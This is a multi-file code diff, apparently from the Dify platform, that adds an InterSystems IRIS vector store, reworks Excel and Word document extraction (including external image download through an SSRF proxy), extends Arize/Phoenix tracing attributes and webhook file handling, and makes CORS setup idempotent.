return f"https://app.arize.com/?redirect_project_name={project_name}"
# Phoenix
return f"{endpoint}/projects/?redirect_project_name={project_name}"
except Exception as e:
logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True)
raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}")
logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True)
raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}")
def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]:
"""Helper method to construct LLM attributes with passed prompts."""
attributes = {}
"""Construct LLM attributes with passed prompts for Arize/Phoenix."""
attributes: dict[str, str] = {}
def set_attribute(path: str, value: object) -> None:
"""Store an attribute safely as a string."""
if value is None:
return
try:
if isinstance(value, (dict, list)):
value = safe_json_dumps(value)
attributes[path] = str(value)
except Exception:
attributes[path] = str(value)
def set_message_attribute(message_index: int, key: str, value: object) -> None:
path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}"
set_attribute(path, value)
def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None:
"""Extract and assign tool call details safely."""
if not tool_call:
return
def safe_get(obj, key, default=None):
if isinstance(obj, dict):
return obj.get(key, default)
return getattr(obj, key, default)
function_obj = safe_get(tool_call, "function", {})
function_name = safe_get(function_obj, "name", "")
function_args = safe_get(function_obj, "arguments", {})
call_id = safe_get(tool_call, "id", "")
base_path = (
f"{SpanAttributes.LLM_INPUT_MESSAGES}."
f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}"
)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args)
set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id)
# Handle list of messages
if isinstance(prompts, list):
for i, msg in enumerate(prompts):
if isinstance(msg, dict):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "")
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user")
# todo: handle assistant and tool role messages, as they don't always
# have a text field, but may have a tool_calls field instead
# e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58',
# 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]}
elif isinstance(prompts, dict):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts)
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user"
elif isinstance(prompts, str):
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts
attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user"
for message_index, message in enumerate(prompts):
if not isinstance(message, dict):
continue
role = message.get("role", "user")
content = message.get("text") or message.get("content") or ""
set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role)
set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content)
tool_calls = message.get("tool_calls") or []
if isinstance(tool_calls, list):
for tool_index, tool_call in enumerate(tool_calls):
set_tool_call_attributes(message_index, tool_index, tool_call)
# Handle single dict or plain string prompt
elif isinstance(prompts, (dict, str)):
set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts)
set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user")
return attributes

View File

@ -0,0 +1,407 @@
"""InterSystems IRIS vector database implementation for Dify.
This module provides vector storage and retrieval using IRIS native VECTOR type
with HNSW indexing for efficient similarity search.
"""
from __future__ import annotations
import json
import logging
import threading
import uuid
from contextlib import contextmanager
from typing import TYPE_CHECKING, Any
from configs import dify_config
from configs.middleware.vdb.iris_config import IrisVectorConfig
from core.rag.datasource.vdb.vector_base import BaseVector
from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory
from core.rag.datasource.vdb.vector_type import VectorType
from core.rag.embedding.embedding_base import Embeddings
from core.rag.models.document import Document
from extensions.ext_redis import redis_client
from models.dataset import Dataset
if TYPE_CHECKING:
import iris
else:
try:
import iris
except ImportError:
iris = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
# Singleton connection pool to minimize IRIS license usage
_pool_lock = threading.Lock()
_pool_instance: IrisConnectionPool | None = None
def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool:
"""Get or create the global IRIS connection pool (singleton pattern)."""
global _pool_instance # pylint: disable=global-statement
with _pool_lock:
if _pool_instance is None:
logger.info("Initializing IRIS connection pool")
_pool_instance = IrisConnectionPool(config)
return _pool_instance
class IrisConnectionPool:
"""Thread-safe connection pool for IRIS database."""
def __init__(self, config: IrisVectorConfig) -> None:
self.config = config
self._pool: list[Any] = []
self._lock = threading.Lock()
self._min_size = config.IRIS_MIN_CONNECTION
self._max_size = config.IRIS_MAX_CONNECTION
self._in_use = 0
self._schemas_initialized: set[str] = set() # Cache for initialized schemas
self._initialize_pool()
def _initialize_pool(self) -> None:
for _ in range(self._min_size):
self._pool.append(self._create_connection())
def _create_connection(self) -> Any:
return iris.connect(
hostname=self.config.IRIS_HOST,
port=self.config.IRIS_SUPER_SERVER_PORT,
namespace=self.config.IRIS_DATABASE,
username=self.config.IRIS_USER,
password=self.config.IRIS_PASSWORD,
)
def get_connection(self) -> Any:
"""Get a connection from pool or create new if available."""
with self._lock:
if self._pool:
conn = self._pool.pop()
self._in_use += 1
return conn
if self._in_use < self._max_size:
conn = self._create_connection()
self._in_use += 1
return conn
raise RuntimeError("Connection pool exhausted")
def return_connection(self, conn: Any) -> None:
"""Return connection to pool after validating it."""
if not conn:
return
# Validate connection health
is_valid = False
try:
cursor = conn.cursor()
cursor.execute("SELECT 1")
cursor.close()
is_valid = True
except (OSError, RuntimeError) as e:
logger.debug("Connection validation failed: %s", e)
try:
conn.close()
except (OSError, RuntimeError):
pass
with self._lock:
self._pool.append(conn if is_valid else self._create_connection())
self._in_use -= 1
def ensure_schema_exists(self, schema: str) -> None:
"""Ensure schema exists in IRIS database.
This method is idempotent and thread-safe. It uses a memory cache to avoid
redundant database queries for already-verified schemas.
Args:
schema: Schema name to ensure exists
Raises:
Exception: If schema creation fails
"""
# Fast path: check cache first (no lock needed for read-only set lookup)
if schema in self._schemas_initialized:
return
# Slow path: acquire lock and check again (double-checked locking)
with self._lock:
if schema in self._schemas_initialized:
return
# Get a connection to check/create schema
conn = self._pool[0] if self._pool else self._create_connection()
cursor = conn.cursor()
try:
# Check if schema exists using INFORMATION_SCHEMA
check_sql = """
SELECT COUNT(*) FROM INFORMATION_SCHEMA.SCHEMATA
WHERE SCHEMA_NAME = ?
"""
cursor.execute(check_sql, (schema,)) # Must be tuple or list
exists = cursor.fetchone()[0] > 0
if not exists:
# Schema doesn't exist, create it
cursor.execute(f"CREATE SCHEMA {schema}")
conn.commit()
logger.info("Created schema: %s", schema)
else:
logger.debug("Schema already exists: %s", schema)
# Add to cache to skip future checks
self._schemas_initialized.add(schema)
except Exception as e:
conn.rollback()
logger.exception("Failed to ensure schema %s exists", schema)
raise
finally:
cursor.close()
def close_all(self) -> None:
"""Close all connections (application shutdown only)."""
with self._lock:
for conn in self._pool:
try:
conn.close()
except (OSError, RuntimeError):
pass
self._pool.clear()
self._in_use = 0
self._schemas_initialized.clear()
class IrisVector(BaseVector):
"""IRIS vector database implementation using native VECTOR type and HNSW indexing."""
def __init__(self, collection_name: str, config: IrisVectorConfig) -> None:
super().__init__(collection_name)
self.config = config
self.table_name = f"embedding_{collection_name}".upper()
self.schema = config.IRIS_SCHEMA or "dify"
self.pool = get_iris_pool(config)
def get_type(self) -> str:
return VectorType.IRIS
@contextmanager
def _get_cursor(self):
"""Context manager for database cursor with connection pooling."""
conn = self.pool.get_connection()
cursor = conn.cursor()
try:
yield cursor
conn.commit()
except Exception:
conn.rollback()
raise
finally:
cursor.close()
self.pool.return_connection(conn)
def create(self, texts: list[Document], embeddings: list[list[float]], **kwargs) -> list[str]:
dimension = len(embeddings[0])
self._create_collection(dimension)
return self.add_texts(texts, embeddings)
def add_texts(self, documents: list[Document], embeddings: list[list[float]], **_kwargs) -> list[str]:
"""Add documents with embeddings to the collection."""
added_ids = []
with self._get_cursor() as cursor:
for i, doc in enumerate(documents):
doc_id = doc.metadata.get("doc_id", str(uuid.uuid4())) if doc.metadata else str(uuid.uuid4())
metadata = json.dumps(doc.metadata) if doc.metadata else "{}"
embedding_str = json.dumps(embeddings[i])
sql = f"INSERT INTO {self.schema}.{self.table_name} (id, text, meta, embedding) VALUES (?, ?, ?, ?)"
cursor.execute(sql, (doc_id, doc.page_content, metadata, embedding_str))
added_ids.append(doc_id)
return added_ids
def text_exists(self, id: str) -> bool: # pylint: disable=redefined-builtin
try:
with self._get_cursor() as cursor:
sql = f"SELECT 1 FROM {self.schema}.{self.table_name} WHERE id = ?"
cursor.execute(sql, (id,))
return cursor.fetchone() is not None
except (OSError, RuntimeError, ValueError):
return False
def delete_by_ids(self, ids: list[str]) -> None:
if not ids:
return
with self._get_cursor() as cursor:
placeholders = ",".join(["?" for _ in ids])
sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE id IN ({placeholders})"
cursor.execute(sql, ids)
def delete_by_metadata_field(self, key: str, value: str) -> None:
"""Delete documents by metadata field (JSON LIKE pattern matching)."""
with self._get_cursor() as cursor:
pattern = f'%"{key}": "{value}"%'
sql = f"DELETE FROM {self.schema}.{self.table_name} WHERE meta LIKE ?"
cursor.execute(sql, (pattern,))
def search_by_vector(self, query_vector: list[float], **kwargs: Any) -> list[Document]:
"""Search similar documents using VECTOR_COSINE with HNSW index."""
top_k = kwargs.get("top_k", 4)
score_threshold = float(kwargs.get("score_threshold") or 0.0)
embedding_str = json.dumps(query_vector)
with self._get_cursor() as cursor:
sql = f"""
SELECT TOP {top_k} id, text, meta, VECTOR_COSINE(embedding, ?) as score
FROM {self.schema}.{self.table_name}
ORDER BY score DESC
"""
cursor.execute(sql, (embedding_str,))
docs = []
for row in cursor.fetchall():
if len(row) >= 4:
text, meta_str, score = row[1], row[2], float(row[3])
if score >= score_threshold:
metadata = json.loads(meta_str) if meta_str else {}
metadata["score"] = score
docs.append(Document(page_content=text, metadata=metadata))
return docs
def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]:
"""Search documents by full-text using iFind index or fallback to LIKE search."""
top_k = kwargs.get("top_k", 5)
with self._get_cursor() as cursor:
if self.config.IRIS_TEXT_INDEX:
# Use iFind full-text search with index
text_index_name = f"idx_{self.table_name}_text"
sql = f"""
SELECT TOP {top_k} id, text, meta
FROM {self.schema}.{self.table_name}
WHERE %ID %FIND search_index({text_index_name}, ?)
"""
cursor.execute(sql, (query,))
else:
# Fallback to LIKE search (inefficient for large datasets)
query_pattern = f"%{query}%"
sql = f"""
SELECT TOP {top_k} id, text, meta
FROM {self.schema}.{self.table_name}
WHERE text LIKE ?
"""
cursor.execute(sql, (query_pattern,))
docs = []
for row in cursor.fetchall():
if len(row) >= 3:
metadata = json.loads(row[2]) if row[2] else {}
docs.append(Document(page_content=row[1], metadata=metadata))
if not docs:
logger.info("Full-text search for '%s' returned no results", query)
return docs
def delete(self) -> None:
"""Delete the entire collection (drop table - permanent)."""
with self._get_cursor() as cursor:
sql = f"DROP TABLE {self.schema}.{self.table_name}"
cursor.execute(sql)
def _create_collection(self, dimension: int) -> None:
"""Create table with VECTOR column and HNSW index.
Uses Redis lock to prevent concurrent creation attempts across multiple
API server instances (api, worker, worker_beat).
"""
cache_key = f"vector_indexing_{self._collection_name}"
lock_name = f"{cache_key}_lock"
with redis_client.lock(lock_name, timeout=20): # pylint: disable=not-context-manager
if redis_client.get(cache_key):
return
# Ensure schema exists (idempotent, cached after first call)
self.pool.ensure_schema_exists(self.schema)
with self._get_cursor() as cursor:
# Create table with VECTOR column
sql = f"""
CREATE TABLE {self.schema}.{self.table_name} (
id VARCHAR(255) PRIMARY KEY,
text CLOB,
meta CLOB,
embedding VECTOR(DOUBLE, {dimension})
)
"""
logger.info("Creating table: %s.%s", self.schema, self.table_name)
cursor.execute(sql)
# Create HNSW index for vector similarity search
index_name = f"idx_{self.table_name}_embedding"
sql_index = (
f"CREATE INDEX {index_name} ON {self.schema}.{self.table_name} "
"(embedding) AS HNSW(Distance='Cosine')"
)
logger.info("Creating HNSW index: %s", index_name)
cursor.execute(sql_index)
logger.info("HNSW index created successfully: %s", index_name)
# Create full-text search index if enabled
logger.info(
"IRIS_TEXT_INDEX config value: %s (type: %s)",
self.config.IRIS_TEXT_INDEX,
type(self.config.IRIS_TEXT_INDEX),
)
if self.config.IRIS_TEXT_INDEX:
text_index_name = f"idx_{self.table_name}_text"
language = self.config.IRIS_TEXT_INDEX_LANGUAGE
# Fixed: Removed extra parentheses and corrected syntax
sql_text_index = f"""
CREATE INDEX {text_index_name} ON {self.schema}.{self.table_name} (text)
AS %iFind.Index.Basic
(LANGUAGE = '{language}', LOWER = 1, INDEXOPTION = 0)
"""
logger.info("Creating text index: %s with language: %s", text_index_name, language)
logger.info("SQL for text index: %s", sql_text_index)
cursor.execute(sql_text_index)
logger.info("Text index created successfully: %s", text_index_name)
else:
logger.warning("Text index creation skipped - IRIS_TEXT_INDEX is disabled")
redis_client.set(cache_key, 1, ex=3600)
class IrisVectorFactory(AbstractVectorFactory):
"""Factory for creating IrisVector instances."""
def init_vector(self, dataset: Dataset, attributes: list, embeddings: Embeddings) -> IrisVector:
if dataset.index_struct_dict:
class_prefix: str = dataset.index_struct_dict["vector_store"]["class_prefix"]
collection_name = class_prefix
else:
dataset_id = dataset.id
collection_name = Dataset.gen_collection_name_by_id(dataset_id)
index_struct_dict = self.gen_index_struct_dict(VectorType.IRIS, collection_name)
dataset.index_struct = json.dumps(index_struct_dict)
return IrisVector(
collection_name=collection_name,
config=IrisVectorConfig(
IRIS_HOST=dify_config.IRIS_HOST,
IRIS_SUPER_SERVER_PORT=dify_config.IRIS_SUPER_SERVER_PORT,
IRIS_USER=dify_config.IRIS_USER,
IRIS_PASSWORD=dify_config.IRIS_PASSWORD,
IRIS_DATABASE=dify_config.IRIS_DATABASE,
IRIS_SCHEMA=dify_config.IRIS_SCHEMA,
IRIS_CONNECTION_URL=dify_config.IRIS_CONNECTION_URL,
IRIS_MIN_CONNECTION=dify_config.IRIS_MIN_CONNECTION,
IRIS_MAX_CONNECTION=dify_config.IRIS_MAX_CONNECTION,
IRIS_TEXT_INDEX=dify_config.IRIS_TEXT_INDEX,
IRIS_TEXT_INDEX_LANGUAGE=dify_config.IRIS_TEXT_INDEX_LANGUAGE,
),
)

View File

@ -187,6 +187,10 @@ class Vector:
from core.rag.datasource.vdb.clickzetta.clickzetta_vector import ClickzettaVectorFactory
return ClickzettaVectorFactory
case VectorType.IRIS:
from core.rag.datasource.vdb.iris.iris_vector import IrisVectorFactory
return IrisVectorFactory
case _:
raise ValueError(f"Vector store {vector_type} is not supported.")

View File

@ -32,3 +32,4 @@ class VectorType(StrEnum):
HUAWEI_CLOUD = "huawei_cloud"
MATRIXONE = "matrixone"
CLICKZETTA = "clickzetta"
IRIS = "iris"

View File

@ -1,7 +1,7 @@
"""Abstract interface for document loader implementations."""
import os
from typing import cast
from typing import TypedDict
import pandas as pd
from openpyxl import load_workbook
@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor
from core.rag.models.document import Document
class Candidate(TypedDict):
idx: int
count: int
map: dict[int, str]
class ExcelExtractor(BaseExtractor):
"""Load Excel files.
@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor):
file_extension = os.path.splitext(self._file_path)[-1].lower()
if file_extension == ".xlsx":
wb = load_workbook(self._file_path, data_only=True)
for sheet_name in wb.sheetnames:
sheet = wb[sheet_name]
data = sheet.values
cols = next(data, None)
if cols is None:
continue
df = pd.DataFrame(data, columns=cols)
df.dropna(how="all", inplace=True)
for index, row in df.iterrows():
page_content = []
for col_index, (k, v) in enumerate(row.items()):
if pd.notna(v):
cell = sheet.cell(
row=cast(int, index) + 2, column=col_index + 1
) # +2 to account for header and 1-based index
if cell.hyperlink:
value = f"[{v}]({cell.hyperlink.target})"
page_content.append(f'"{k}":"{value}"')
else:
page_content.append(f'"{k}":"{v}"')
documents.append(
Document(page_content=";".join(page_content), metadata={"source": self._file_path})
)
wb = load_workbook(self._file_path, read_only=True, data_only=True)
try:
for sheet_name in wb.sheetnames:
sheet = wb[sheet_name]
header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet)
if not column_map:
continue
start_row = header_row_idx + 1
for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False):
if all(cell.value is None for cell in row):
continue
page_content = []
for col_idx, cell in enumerate(row):
value = cell.value
if col_idx in column_map:
col_name = column_map[col_idx]
if hasattr(cell, "hyperlink") and cell.hyperlink:
target = getattr(cell.hyperlink, "target", None)
if target:
value = f"[{value}]({target})"
if value is None:
value = ""
elif not isinstance(value, str):
value = str(value)
value = value.strip().replace('"', '\\"')
page_content.append(f'"{col_name}":"{value}"')
if page_content:
documents.append(
Document(page_content=";".join(page_content), metadata={"source": self._file_path})
)
finally:
wb.close()
elif file_extension == ".xls":
excel_file = pd.ExcelFile(self._file_path, engine="xlrd")
@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor):
df = excel_file.parse(sheet_name=excel_sheet_name)
df.dropna(how="all", inplace=True)
for _, row in df.iterrows():
for _, series_row in df.iterrows():
page_content = []
for k, v in row.items():
for k, v in series_row.items():
if pd.notna(v):
page_content.append(f'"{k}":"{v}"')
documents.append(
@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor):
raise ValueError(f"Unsupported file extension: {file_extension}")
return documents
def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]:
"""
Scan first N rows to find the most likely header row.
Returns:
header_row_idx: 1-based index of the header row
column_map: Dict mapping 0-based column index to column name
max_col_idx: 1-based index of the last valid column (for iter_rows boundary)
"""
# Store potential candidates: (row_index, non_empty_count, column_map)
candidates: list[Candidate] = []
# Limit scan to avoid performance issues on huge files
# We iterate manually to control the read scope
for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1):
# Filter out empty cells and build a temp map for this row
# col_idx is 0-based
row_map = {}
for col_idx, cell_value in enumerate(row):
if cell_value is not None and str(cell_value).strip():
row_map[col_idx] = str(cell_value).strip().replace('"', '\\"')
if not row_map:
continue
non_empty_count = len(row_map)
# Header selection heuristic (implemented):
# - Prefer the first row with at least 2 non-empty columns.
# - Fallback: choose the row with the most non-empty columns
# (tie-breaker: smaller row index).
candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map})
if not candidates:
return 0, {}, 0
# Choose the best candidate header row.
best_candidate: Candidate | None = None
# Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback.
for cand in candidates:
if cand["count"] >= 2:
best_candidate = cand
break
# Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns
if not best_candidate:
# Sort by count desc, then index asc
candidates.sort(key=lambda x: (-x["count"], x["idx"]))
best_candidate = candidates[0]
# Determine max_col_idx (1-based for openpyxl)
# It is the index of the last valid column in our map + 1
max_col_idx = max(best_candidate["map"].keys()) + 1
return best_candidate["idx"], best_candidate["map"], max_col_idx

View File

@ -84,22 +84,45 @@ class WordExtractor(BaseExtractor):
image_count = 0
image_map = {}
for rel in doc.part.rels.values():
for r_id, rel in doc.part.rels.items():
if "image" in rel.target_ref:
image_count += 1
if rel.is_external:
url = rel.target_ref
response = ssrf_proxy.get(url)
if not self._is_valid_url(url):
continue
try:
response = ssrf_proxy.get(url)
except Exception as e:
logger.warning("Failed to download image from URL: %s: %s", url, str(e))
continue
if response.status_code == 200:
image_ext = mimetypes.guess_extension(response.headers["Content-Type"])
image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", ""))
if image_ext is None:
continue
file_uuid = str(uuid.uuid4())
file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." + image_ext
file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext
mime_type, _ = mimetypes.guess_type(file_key)
storage.save(file_key, response.content)
else:
continue
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
# Use r_id as key for external images since target_part is undefined
image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
else:
image_ext = rel.target_ref.split(".")[-1]
if image_ext is None:
@ -110,27 +133,28 @@ class WordExtractor(BaseExtractor):
mime_type, _ = mimetypes.guess_type(file_key)
storage.save(file_key, rel.target_part.blob)
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
db.session.commit()
image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
# save file to db
upload_file = UploadFile(
tenant_id=self.tenant_id,
storage_type=dify_config.STORAGE_TYPE,
key=file_key,
name=file_key,
size=0,
extension=str(image_ext),
mime_type=mime_type or "",
created_by=self.user_id,
created_by_role=CreatorUserRole.ACCOUNT,
created_at=naive_utc_now(),
used=True,
used_by=self.user_id,
used_at=naive_utc_now(),
)
db.session.add(upload_file)
# Use target_part as key for internal images
image_map[rel.target_part] = (
f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)"
)
db.session.commit()
return image_map
def _table_to_markdown(self, table, image_map):
@ -186,11 +210,17 @@ class WordExtractor(BaseExtractor):
image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed")
if not image_id:
continue
image_part = paragraph.part.rels[image_id].target_part
if image_part in image_map:
image_link = image_map[image_part]
paragraph_content.append(image_link)
rel = paragraph.part.rels.get(image_id)
if rel is None:
continue
# For external images, use image_id as key; for internal, use target_part
if rel.is_external:
if image_id in image_map:
paragraph_content.append(image_map[image_id])
else:
image_part = rel.target_part
if image_part in image_map:
paragraph_content.append(image_map[image_part])
else:
paragraph_content.append(run.text)
return "".join(paragraph_content).strip()
@ -227,6 +257,18 @@ class WordExtractor(BaseExtractor):
def parse_paragraph(paragraph):
paragraph_content = []
def append_image_link(image_id, has_drawing):
"""Helper to append image link from image_map based on relationship type."""
rel = doc.part.rels[image_id]
if rel.is_external:
if image_id in image_map and not has_drawing:
paragraph_content.append(image_map[image_id])
else:
image_part = rel.target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
for run in paragraph.runs:
if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"):
# Process drawing type images
@ -243,10 +285,18 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed"
)
if embed_id:
image_part = doc.part.related_parts.get(embed_id)
if image_part in image_map:
has_drawing = True
paragraph_content.append(image_map[image_part])
rel = doc.part.rels.get(embed_id)
if rel is not None and rel.is_external:
# External image: use embed_id as key
if embed_id in image_map:
has_drawing = True
paragraph_content.append(image_map[embed_id])
else:
# Internal image: use target_part as key
image_part = doc.part.related_parts.get(embed_id)
if image_part in image_map:
has_drawing = True
paragraph_content.append(image_map[image_part])
# Process pict type images
shape_elements = run.element.findall(
".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict"
@ -261,9 +311,7 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
)
if image_id and image_id in doc.part.rels:
image_part = doc.part.rels[image_id].target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
append_image_link(image_id, has_drawing)
# Find imagedata element in VML
image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata")
if image_data is not None:
@ -271,9 +319,7 @@ class WordExtractor(BaseExtractor):
"{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id"
)
if image_id and image_id in doc.part.rels:
image_part = doc.part.rels[image_id].target_part
if image_part in image_map and not has_drawing:
paragraph_content.append(image_map[image_part])
append_image_link(image_id, has_drawing)
if run.text.strip():
paragraph_content.append(run.text.strip())
return "".join(paragraph_content) if paragraph_content else ""

View File

@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum):
notion_import = "notion"
local_file = "file_upload"
online_document = "online_document"
online_drive = "online_drive"

View File

@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError):
pass
class ToolSSRFError(ValueError):
pass
class ToolCredentialPolicyViolationError(ValueError):
pass

View File

@ -101,6 +101,8 @@ class ToolFileMessageTransformer:
meta = message.meta or {}
mimetype = meta.get("mime_type", "application/octet-stream")
if not mimetype:
mimetype = "application/octet-stream"
# get filename from meta
filename = meta.get("filename", None)
# if message is str, encode it to bytes

View File

@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser:
except ToolApiSchemaError as e:
openapi_error = e
# openai parse error, fallback to swagger
# openapi parse error, fallback to swagger
try:
converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi(
loaded_content, extra_info=extra_info, warning=warning
@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser:
), schema_type
except ToolApiSchemaError as e:
swagger_error = e
# swagger parse error, fallback to openai plugin
try:
openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle(

View File

@ -1,14 +1,22 @@
import logging
from collections.abc import Mapping
from typing import Any
from core.file import FileTransferMethod
from core.variables.types import SegmentType
from core.variables.variables import FileVariable
from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.enums import NodeExecutionType, NodeType
from core.workflow.node_events import NodeRunResult
from core.workflow.nodes.base.node import Node
from factories import file_factory
from factories.variable_factory import build_segment_with_type
from .entities import ContentType, WebhookData
logger = logging.getLogger(__name__)
class TriggerWebhookNode(Node[WebhookData]):
node_type = NodeType.TRIGGER_WEBHOOK
@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs=outputs,
)
def generate_file_var(self, param_name: str, file: dict):
related_id = file.get("related_id")
transfer_method_value = file.get("transfer_method")
if transfer_method_value:
transfer_method = FileTransferMethod.value_of(transfer_method_value)
match transfer_method:
case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
file["upload_file_id"] = related_id
case FileTransferMethod.TOOL_FILE:
file["tool_file_id"] = related_id
case FileTransferMethod.DATASOURCE_FILE:
file["datasource_file_id"] = related_id
try:
file_obj = file_factory.build_from_mapping(
mapping=file,
tenant_id=self.tenant_id,
)
file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
except ValueError:
logger.error(
"Failed to build FileVariable for webhook file parameter %s",
param_name,
exc_info=True,
)
return None
def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
"""Extract outputs based on node configuration from webhook inputs."""
outputs = {}
@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]):
outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
continue
elif self.node_data.content_type == ContentType.BINARY:
outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
raw_data: dict = webhook_data.get("body", {}).get("raw", {})
file_var = self.generate_file_var(param_name, raw_data)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = raw_data
continue
if param_type == "file":
# Get File object (already processed by webhook controller)
file_obj = webhook_data.get("files", {}).get(param_name)
outputs[param_name] = file_obj
files = webhook_data.get("files", {})
if files and isinstance(files, dict):
file = files.get(param_name)
if file and isinstance(file, dict):
file_var = self.generate_file_var(param_name, file)
if file_var:
outputs[param_name] = file_var
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
outputs[param_name] = files
else:
# Get regular body parameter
outputs[param_name] = webhook_data.get("body", {}).get(param_name)
# Include raw webhook data for debugging/advanced use
outputs["_webhook_raw"] = webhook_data
return outputs

View File

@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs):
dataset.index_struct,
dataset.collection_binding_id,
dataset.doc_form,
dataset.pipeline_id,
)

View File

@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN)
EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id")
def init_app(app: DifyApp):
# register blueprint routers
def _apply_cors_once(bp, /, **cors_kwargs):
"""Make CORS idempotent so blueprints can be reused across multiple app instances."""
if getattr(bp, "_dify_cors_applied", False):
return
from flask_cors import CORS
CORS(bp, **cors_kwargs)
bp._dify_cors_applied = True
def init_app(app: DifyApp):
# register blueprint routers
from controllers.console import bp as console_app_bp
from controllers.files import bp as files_bp
from controllers.inner_api import bp as inner_api_bp
@ -22,7 +32,7 @@ def init_app(app: DifyApp):
from controllers.trigger import bp as trigger_bp
from controllers.web import bp as web_bp
CORS(
_apply_cors_once(
service_api_bp,
allow_headers=list(SERVICE_API_HEADERS),
methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
@ -30,7 +40,7 @@ def init_app(app: DifyApp):
)
app.register_blueprint(service_api_bp)
CORS(
_apply_cors_once(
